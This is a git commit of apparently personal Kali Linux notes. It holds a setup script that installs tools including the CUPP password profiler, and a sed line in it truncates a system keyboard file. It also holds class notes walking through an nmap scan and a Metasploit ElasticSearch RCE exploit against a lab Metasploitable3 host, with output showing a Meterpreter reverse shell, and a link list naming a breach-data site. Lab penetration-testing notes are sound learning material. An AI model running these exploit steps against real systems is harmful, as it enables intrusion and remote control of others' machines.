initial commit

2020-01-02 01:04:35 +01:00
commit 6befc5d3c1
162 changed files with 19086 additions and 0 deletions
--- a/distros/kali/install-kali.sh
+++ b/distros/kali/install-kali.sh
@@ -0,0 +1,87 @@
+cd /usr/share/X11/xkb/symbols/
+cp pc pc.bak
+echo "pc backup copied - this isn't tested" >> ~/install.log
+sed s/Caps_Lock/Escape/ pc > pc
+cd
+echo "deb https://dl.bintray.com/hawkeye116477/waterfox-deb release main" | sudo tee -a /etc/apt/sources.list
+curl https://bintray.com/user/downloadSubjectPublicKey?username=hawkeye116477 | sudo apt-key add -
+sudo apt-get update && sudo apt-get install waterfox
+
+echo "deb http://http.kali.org/ /kali main contrib non-free
+deb http://http.kali.org/ /wheezy main contrib non-free
+deb http://http.kali.org/kali kali-dev main contrib non-free
+deb http://http.kali.org/kali kali-dev main/debian-installer
+deb-src http://http.kali.org/kali kali-dev main contrib non-free
+deb http://http.kali.org/kali kali main contrib non-free
+deb http://http.kali.org/kali kali main/debian-installer
+deb-src http://http.kali.org/kali kali main contrib non-free
+deb http://security.kali.org/kali-security kali/updates main contrib non-free
+deb-src http://security.kali.org/kali-security kali/updates main contrib non-free" >> /etc/apt/sources.list
+
+setxkbmap gb
+
+# gksudo firefox -install-global-extension addon-1865-latest.xpi
+		#install addon with cli
+apt-get -y install openvpn
+cd /etc/openvpn
+
+
+sudo wget https://downloads.nordcdn.com/configs/archives/servers/ovpn.zip
+
+unzip ovpn.zip
+
+	rm ovpn.zip
+
+sudo apt-get install openvpn network-manager-openvpn network-manager-openvpn-gnome
+
+wget https://github.com/maestrogerardo/i3-gaps-deb/archive/master.zip
+
+echo "if you don't have openvpn options in your gnome desktop, this just isn't going to work.  Get the openvpn manager, called 'openvpn-service-gnome' or some such" >> ~/*log
+unzip ma*
+
+rm ma*zip
+
+cd i3-g*
+
+sudo apt -y update;sudo apt -y upgrade
+
+./i3*
+
+cd
+
+mv i3/ .config
+
+sudo apt install feh compton ranger w3m cmus scrot
+
+sudo apt install tor
+
+wget https://github.com/dpayne/cli-visualizer/archive/master.zip
+
+echo "If vis is playing funny-buggers, enter the install files and input the commands manually.  May be an architecture problem as I don't have arm cpu" >> *log
+
+unzip master.zip
+
+rm master.zip
+
+cd cli-vis*
+
+apt install libfftw3-dev libncursesw5-dev libpulse-dev
+
+./install.sh
+
+cd
+
+
+mkdir Images;mkdir Images/Wallpapers;mkdir Images/Screenshots
+
+apt install -y encfs cmatrix cowsay
+
+mkdir Tools
+
+cd Tools
+
+wget https://github.com/Mebus/cupp/archive/master.zip
+
+unzip master.zip;rm master.zip
+
+cd
--- a/distros/kali/metasploit.md
+++ b/distros/kali/metasploit.md
@@ -0,0 +1,124 @@
+> service postgresql start
+
+> systemctl status postgresql
+
+> msfdb init
+
+start the metasploit
+
+> msfconfole
+
+show exploits
+
+Examples:
+
+> info exploit/something
+
+> search cve:2019
+
+## Basic theory
+
+There are vulnerabilities and payloads.
+
+Payloads would typically give us a shell on the remote system.  Android, Linux and Windows require different shells.
+
+You can attach via 'reverse' or 'bind'.  A 'bind' is best, as the user opens a port, and you connect.  Mostly, you have to use 'reverse', which opens a connection to you.
+
+# Notes for Class
+
+Victim: 172.18.3.26
+
+> nmap -Pn -sV 172.18.3.26 --script=vuln
+
+> nmap -Pn -sV 172.18.3.26 
+
+Output:
+
+```
+
+Service scan Timing: About 66.67% done; ETC: 15:28 (0:00:10 remaining)
+Nmap scan report for 172.18.3.26
+Host is up (0.016s latency).
+Not shown: 988 filtered ports
+PORT      STATE SERVICE          VERSION
+21/tcp    open  ftp              Microsoft ftpd
+22/tcp    open  ssh              OpenSSH 7.1 (protocol 2.0)
+80/tcp    open  http             Microsoft IIS httpd 7.5
+4848/tcp  open  appserv-http?
+8022/tcp  open  oa-system?
+8080/tcp  open  http             Sun GlassFish Open Source Edition  4.0
+8383/tcp  open  ssl/m2mservices?
+9200/tcp  open  tcpwrapped
+49153/tcp open  unknown
+49154/tcp open  unknown
+49159/tcp open  unknown
+49161/tcp open  tcpwrapped
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port4848-TCP:V=7.80%I=7%D=9/14%Time=5D7D06F5%P=x86_64-pc-linux-gnu%r(Ge
+SF:tRequest,91,"HTTP/1\.1\x20302\x20Found\r\nLocation:\x20https://metasplo
+SF:itable3-win2k8:4848/\r\nDate:\x20Sat,\x2014\x20Sep\x202019\x2015:27:44\
+SF:x20GMT\r\nConnection:\x20close\r\nContent-Length:\x200\r\n\r\n");
+MAC Address: D4:25:8B:B6:85:F5 (Intel Corporate)
+Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+
+```
+
+Note  this one:
+
+`9200/tcp  open  tcpwrapped`
+
+Apparently that's 'elasticsearch', so in metasploit we can do:
+
+`search elasticsearch`
+
+```
+   #  Name                                              Disclosure Date  Rank       Check  Description
+   -  ----                                              ---------------  ----       -----  -----------
+   0  auxiliary/scanner/elasticsearch/indices_enum                       normal     Yes    ElasticSearch Indices Enumeration Utility
+   1  auxiliary/scanner/http/elasticsearch_traversal                     normal     Yes    ElasticSearch Snapshot API Directory Traversal
+   2  exploit/multi/elasticsearch/script_mvel_rce       2013-12-09       excellent  Yes    ElasticSearch Dynamic Script Arbitrary Java Execution
+   3  exploit/multi/elasticsearch/search_groovy_script  2015-02-11       excellent  Yes    ElasticSearch Search Groovy Sandbox Bypass
+   4  exploit/multi/misc/xdh_x_exec                     2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
+
+```
+
+If you want to use 2, `use 2` or `use/multi/ela` then tab out.
+
+> show options
+
+> set rhost 172.18.3.26
+
+The remote port's already set at this point.
+
+We've so far done use, rhost, and port.
+
+> exploit
+
+```
+[*] Started reverse TCP handler on 172.18.3.112:4444 
+[*] Trying to execute arbitrary Java...
+[*] Discovering remote OS...
+[+] Remote OS is 'Windows Server 2008 R2'
+[*] Discovering TEMP path
+[+] TEMP path identified: 'C:\Windows\TEMP\'
+[*] Sending stage (53845 bytes) to 172.18.3.26
+[*] Meterpreter session 1 opened (172.18.3.112:4444 -> 172.18.3.26:49311) at 2019-09-14 15:38:49 +0000
+[!] This exploit may require manual cleanup of 'C:\Windows\TEMP\LXjUK.jar' on the target
+```
+
+> dir
+
+# Next Wordpress
+
+http://172.18.3.26:8585/wordpress/
+
+Back to normal shell.
+
+> search wordpress ninja
+
+
+> use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
+
+
--- a/distros/kali/webresources
+++ b/distros/kali/webresources
@@ -0,0 +1,8 @@
+https://coldwallet.io/
+
+https://www.it-vn.com/2019/07/configure-ssh-to-avoid-from-shodan-and.html
+
+https://wickr.com
+
+https://weleakinfo.com/
+